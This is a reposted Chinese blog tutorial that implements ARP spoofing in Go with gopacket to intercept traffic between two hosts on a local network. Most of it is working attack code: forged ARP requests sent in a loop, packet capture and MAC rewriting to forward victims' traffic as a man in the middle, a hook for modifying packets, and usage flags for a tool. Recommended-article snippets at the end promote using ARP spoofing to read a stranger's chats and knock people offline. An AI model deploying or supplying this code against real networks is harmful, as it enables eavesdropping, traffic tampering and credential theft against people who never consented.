arp欺骗进行流量截获-2

最新推荐文章于 2024-06-03 16:49:19 发布
最新推荐文章于 2024-06-03 16:49:19 发布
阅读量505 收藏
点赞数
分类专栏: 网络协议

转:http://www.cnblogs.com/baizx/p/5572878.html

 

上一篇讲了原理,那么这一篇主要讲如何实现。基本上也就是实现上面的两个步骤,这里基于gopacket实现,我会带着大家一步步详细把每个步骤都讲到。

ARP 欺骗

首先就是伪造ARP请求,让A和B把数据包发到我这里来。

利用gopacket 发送一个ARP请求,下面是一个实现函数,可以用来发送一个指定ip地址和mac地址的arp请求。

//send a arp reply from srcIp to dstIP
func SendAFakeArpRequest(handle *pcap.Handle, dstIP, srcIP net.IP, dstMac, srcMac net.HardwareAddr) {

arpLayer := &layers.ARP{
AddrType:layers.LinkTypeEthernet,
Protocol:layers.EthernetTypeIPv4,
HwAddressSize:6,
ProtAddressSize:4,
Operation:layers.ARPRequest,
DstHwAddress:dstMac, //正常情况下,这里应该是FFFFFFFFF,但是这里通过指定来发送虚假定向ARP请求
DstProtAddress:[]byte(dstIP.To4()),
SourceHwAddress:srcMac,
SourceProtAddress:[]byte(srcIP.To4()),
}

ethernetLayer := &layers.Ethernet{
SrcMAC: srcMac,
DstMAC: dstMac, //正常情况下,这里应该是FFFFFFFFF,但是这里通过指定来发送虚假定向ARP请求
EthernetType:layers.EthernetTypeARP,
}

// And create the packet with the layers
buffer := gopacket.NewSerializeBuffer()
opts := gopacket.SerializeOptions{
FixLengths:true,
ComputeChecksums:true,
}
err := gopacket.SerializeLayers(buffer, opts,
ethernetLayer,
arpLayer,
)
if err != nil {
log.Error(err)
}
outgoingPacket := buffer.Bytes()
log.Debug("sending arp")
//log.Debug(hex.Dump(outgoingPacket))
handleMutex.Lock()
err = handle.WritePacketData(outgoingPacket)
handleMutex.Unlock()
if err != nil {
log.Error(err)
}
}

 

 

    下面是循环向A和B播报虚假MAC地址,其中要攻击的就是IP1和ip2

//tell ip1 that ip2's mac is mymac and tell ip2 that ip1's mac is mymac periodly
func sendSudeoArpInfo(interfaceName string, myip, ip1, ip2 net.IP, mymac, mac1, mac2 net.HardwareAddr, shouldStop *bool) { fmt.Printf("start sending fake arp packets...\n") handle, err := pcap.OpenLive(interfaceName, 65535, false, pcap.BlockForever) handle.SetDirection(pcap.DirectionOut) defer handle.Close() if err != nil { log.Fatal(err) } for ! (*shouldStop) { //tell ip1 that ip2's mac is mymac SendAFakeArpRequest(handle, ip1, ip2, mac1, mymac) //tell ip2 that ip1's mac is mymac SendAFakeArpRequest(handle, ip2, ip1, mac2, mymac) time.Sleep(1 * time.Second) } }

 

这样第一步就完成了。

剩下的就是第二步,等待数据包到来,然后进行转发

IP转发

如果只是单纯想观察一下数据流,比如把数据报保存下来,留作以后分析等,那其实很简单,我们可以不用编程,直接使用ip forward这样的功能,如果在linux下,可以直接这样:

#:> echo 1 > /proc/sys/net/ipv4/ip_forward

sudo sysctl -w net.inet.ip.forwarding=1

这里我们主要讲如何用程序来实现。arppoisoning函数会进行包转发,参数很直观,第一个是要处理的网卡,最后一个用来控制停止。

/*
将截获ip1ip2之间通信的所有流量,自己相当于是一个中间人的角色,
close(stop) or write somthing to stop when you want to stop
 */
func ArpPoisoning(interfaceName string, myip, ip1, ip2 net.IP, mymac, mac1, mac2 net.HardwareAddr, stop chan bool) { var filter string = fmt.Sprintf("ip host %s or ip host %s ", ip1.To4().String(), ip2.To4().String()) err = handle.SetBPFFilter(filter) //设置包过滤,只处理ip1 ip2 if err != nil { log.Fatal(err) return } log.Infof("capture filter: ip host %s or ip host %s ", ip1.To4().String(), ip2.To4().String()) packetSource := gopacket.NewPacketSource(handle, handle.LinkType()) ip2Mac := make(map[string]net.HardwareAddr) ip2Mac[ip1.String()] = mac1 ip2Mac[ip2.String()] = mac2 in := packetSource.Packets() var packet gopacket.Packet for { select { case <-stop: shouldStop = true time.Sleep(3 * time.Second) //多等一会儿,让arp发送线程有机会结束

							return case packet = <-in: layer := packet.Layer(layers.LayerTypeEthernet) log.Debug("receive a packet") if layer != nil { ethLayer := layer.(*layers.Ethernet) //下面这一段来判断是ip1ip2之间的数据包,如果是,那么应该进行mac地址修改,然后再转发  if bytes.Compare(ethLayer.DstMAC, mymac) == 0 { layer = packet.Layer(layers.LayerTypeIPv4) if layer != nil { iplayer := layer.(*layers.IPv4) //目标mac是我,并且ip地址是我要监听的两个,那么转发 if ( (ipEqual(iplayer.DstIP, ip1) && ipEqual(iplayer.SrcIP, ip2) ) || ( ipEqual(iplayer.DstIP, ip2) && ipEqual(iplayer.SrcIP, ip1) )) { log.Debug("receive a valid packet...") raw := PacketHandler(packet, ip2Mac) //handleMutex.Lock() err := handle.WritePacketData(raw) log.Debug("resend this packet..") //handleMutex.Unlock() if err != nil { log.Error(err) return } } } } } } } }

 

PacketHandler 可以自定义,这样可以实现自己想要的功能,比如修改包的内容再转发等等。

下面是基本的PacketHandler实现,就是什么都不做,只是转发。

func PacketHandler(packet gopacket.Packet, ip2Mac map[string]net.HardwareAddr) []byte { data := packet.Data()  layer := packet.Layer(layers.LayerTypeIPv4) iplayer := layer.(*layers.IPv4) layer = packet.Layer(layers.LayerTypeEthernet) ethLayer := layer.(*layers.Ethernet) dstMac := ip2Mac[iplayer.DstIP.String()] //找到真正的mac地址是什么,然后修改
 //copy(data,dstMac) for i := 0; i < len(dstMac); i++ { data[i] = dstMac[i] } return data }

 

到此为止,已经把ARP欺骗进行流量截获的基本原理以及实现方法讲解完毕,当然真正的可运行程序要比这上面说的复杂,要考虑到使用方便等,完整的实现可以见https://github.com/nkbai/arppoison

 

用法

arppoison -ip1 192.168.56.103 -ip2 192.168.56.104 -t seconds -d
-ip1,-ip2: the ip will be attacked
-t how many seconds to attackdefault is 3000 *3600 seconds, 3000 hour
-d print debug message

 

修行者 坚守者
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ARP流量分析
qq_46441427的博客
03-23 334
ARP结构 根据抓的,可以填下表 ARP缓存策略 首先有这样一个结构 ns56A往192.168.57.126 也就是ns57Aping了一下,依次在tap56A、tap56B、tapRB_RA、tapRA_RC和tapRC_57A抓,分别是ns56A,ns56B,RB,RA,RC 首先reply告诉了56A,56.1的MAC是哪,这就是56A的下一跳 其中在ns56A也会留有缓存 而在56B中,没有这条缓存,因为不是它自己的mac,没有和A通信所以只是收到一个广播消息 而路由器RB的5
WireShark流量分析(数据经过三层路由之后的变化(ARP))
oJiuJieZhong的博客
02-21 1332
拓扑图: 数据传递过程: PC1------SW---------ROUTER---------SW-----PC2 整个过程的流量帧: 流量分析: 情况是第一次通信,有路由器存在,跨网段的通信。 ① PC1开始Ping PC2,因为是跨网段的通信,所以要先发ARP请求网关的MAC地址,要拿到网关的MAC地址才能正确封装数据。 这时ARP(注意这里是ARP,不是你的Ping)里源ip地址为PC1的IP地址,源MAC地址为PC1的MAC地址,目标IP地址网关的地址,目标MAC地址为全F
ARP流量分析:网络运维工程师必备技能
Johnstons的博客
06-03 786
ARP(Address Resolution Protocol,地址解析协议)是网络通信中不可或缺的一部分。它主要用于IPv4网络中,通过解析IP地址找到相应的MAC地址,以确保数据能够准确传输到目标设备。ARP流量则是指在网络中传输的所有ARP请求和响应数据
局域网内ARP流量分析
05-12
IP数据常通过以太网发送,以太网设备并不识别32位IP地址,它们是以48位以太网地址传输以太网数据。因此,必须把IP目的地址转换成以太网目 的地址。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。它就是通过地址解析协议获得的。ARP协议用于将网络中的IP地址解析为的硬件地址(MAC地址),以保证通信的顺利进行
ARP欺骗
xiaoxiao的博客
12-20 341
一、实验环境 攻击机:Kali Linux 靶 机:Windows XP 网卡连接:NAT(Vmnet 8) IP地址:自动获取(通过Vmware软件自动分配IP地址) 二、实验步骤: 1、查看IP地址 Kalinux:ifconfig eth0 Windows XP:ipconfig /all 判断2台主机IP地址是否在同一个IP网段 2、连通性测试 Windows XP:关闭防火墙 ...
arp欺骗
网络设备配置-华为
10-14 582
原理:在内网中,是受害者相信你的设备是网关设备,使网关设备相信你的设备是受害者。 实验步骤(需要了解arp协议) 受害者w7: 192.168.208.129 00-0c-29-0c-6b-bf 攻击者(kali): 192.168.208.128 00-0c-29-87-c2-13 网关 : 192.168.208.2 00-50-56-e7-89-f5 1、 kali中运行:arpspoof -t 192.168.208.129 -r 192.168.
ArpSpoof-arp欺骗.rar
04-03
ArpSpoof-arp欺骗.rar》是一款专用于Windows系统的ARP欺骗工具,它涉及到了网络通信中的重要概念和安全问题。ARP(Address Resolution Protocol)即地址解析协议,是TCP/IP协议栈中的一个关键组件,主要负责将IP...
ARP欺骗攻击.rar
04-04
然而,ARP协议本身的无认证特性使得它容易被恶意攻击者利用,进行ARP欺骗ARP欺骗攻击的基本原理是攻击者通过发送虚假的ARP响应,将目标主机的IP地址与错误的MAC地址关联,导致数据被错误地转发到攻击者而非...
Winpcap 信息截获.rar_arp_hack_winpcap_winpcap 数据内容_winpcap-pcap
09-21
"www.pudn.com.txt"可能是对Winpcap使用或ARP欺骗技术的说明文档,而"Winpcap 信息截获"可能是一个示例程序或者教程,详细介绍了如何利用Winpcap进行信息截获括设置过滤规则、捕获数据、分析网络流量等步骤。...
分析arp网络故障 抓工具ethereal
04-30
工具ethereal 网络协议分析,网络流量分析,找出局域网网络上网慢原因,分析arp网络故障
计算机病毒与防护:ARP欺骗.ppt
06-10
ARP欺骗可以与中间人攻击相结合,攻击者可以截获并解密网络流量进行数据窃取、会话劫持等活动。此外,攻击者还可以利用ARP欺骗实施DoS(Denial of Service,拒绝服务)攻击,通过大量伪造的ARP请求或回复,消耗...
使用Cain进行DNS劫持、ARP欺骗.pdf
11-06
ARP欺骗是指攻击者伪装成目标计算机,欺骗目标计算机的MAC地址,从而截获目标计算机的网络流量。 在使用Cain工具时,我们首先需要选择要欺骗的IP地址和目标网关。例如,我们可以选择IP地址为192.168.0.100,目标...
【golang】利用gopacket发送arp获取局域网设备的IP、MAC
qq_38858546的博客
05-22 5524
package main import ( "fmt" "net" "log" "flag" "math" "strconv" "bytes" "github.com/google/gopacket/pcap" "github.com/google/gopacket/layers" "github.com/google/gopacket" manuf "github.com/timest/gomanuf" "context" "time" "sync" ) type IP
ARP 原理以及 ARP 攻击与欺骗
supermouse的博客
12-15 1944
文章目录前言ARP 攻击的原理ARP 协议ARP 攻击ARP 攻击实战前期准备环境搭建ARP 报文格式编写代码测试攻击者接收数据结语参考链接 前言 前段时间在学网络协议的时候,知道了有 ARP 攻击这么个东西,但是当时对 Linux 环境下的 C 语言编程不是很了解,一直没有机会实践一下。终于在最近学习了网络编程之后,才算是入门了一点点 Linux C 语言编程。于是乎,经过两天的研究,终于亲自试...
55.伪造UDP数据
CodeAllen嵌入式
10-10 1687
在发送 UDP 数据时,为了避免被发现,我们可以伪造假的 UDP 数据。 基于 IPv4 伪造 UDP 数据 可以基于 IPv4 伪造 UDP,它可以设置假的 IP 地址和假的端口等。伪造需要使用 netwox 工具中编号为 39 的模块来实现。 【实例】基于 IPv4 伪造 UDP 。 1) 不使用选项,直接运行并查看基于 IPv4 的 UDP ,执行命令如下: root@daxueba:~# netwox 39 输出信息如下: IP_______________________
使用ARP欺骗, 截取局域网中任意一台机器的网页请求,破解用户名密码等信息
weixin_33713707的博客
11-17 945
  ARP欺骗的作用   当你在网吧玩,发现有人玩LOL大吵大闹, 用ARP欺骗把他踢下线吧   当你在咖啡厅看上某一个看书的妹纸,又不好意思开口要微信号, 用arp欺骗,不知不觉获取到她的微信号和聊天记录,吓一吓人家也是可以的嘛;   当你没啥事的时候, 想窜改局域网内的baidu的首页, 用arp欺骗吧, 把baidu首页跳到你想要的网页;   当你想看看同一个局域网的人都在浏览啥...
golang使用gopacket进行数据捕获,注入和分析
热门推荐
虾米的博客
05-23 2万+
使用golang实现网络抓是非常容易的,可以使用谷歌的github.com/google/gopacket。由于gopacket构建在libpcap之上,我强烈建议您了解该库的工作原理。您可以在C中学习如何使用libpcap进行更深入的了解。 1.libpcap gopacket是基于libpcap(数据捕获函数库)的,该库提供的C函数接口用于捕捉经过指定网络接口的数据,该接口应该是被...
Django 安装 linux
最新发布
09-05
Django 安装 主要应用于linux
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值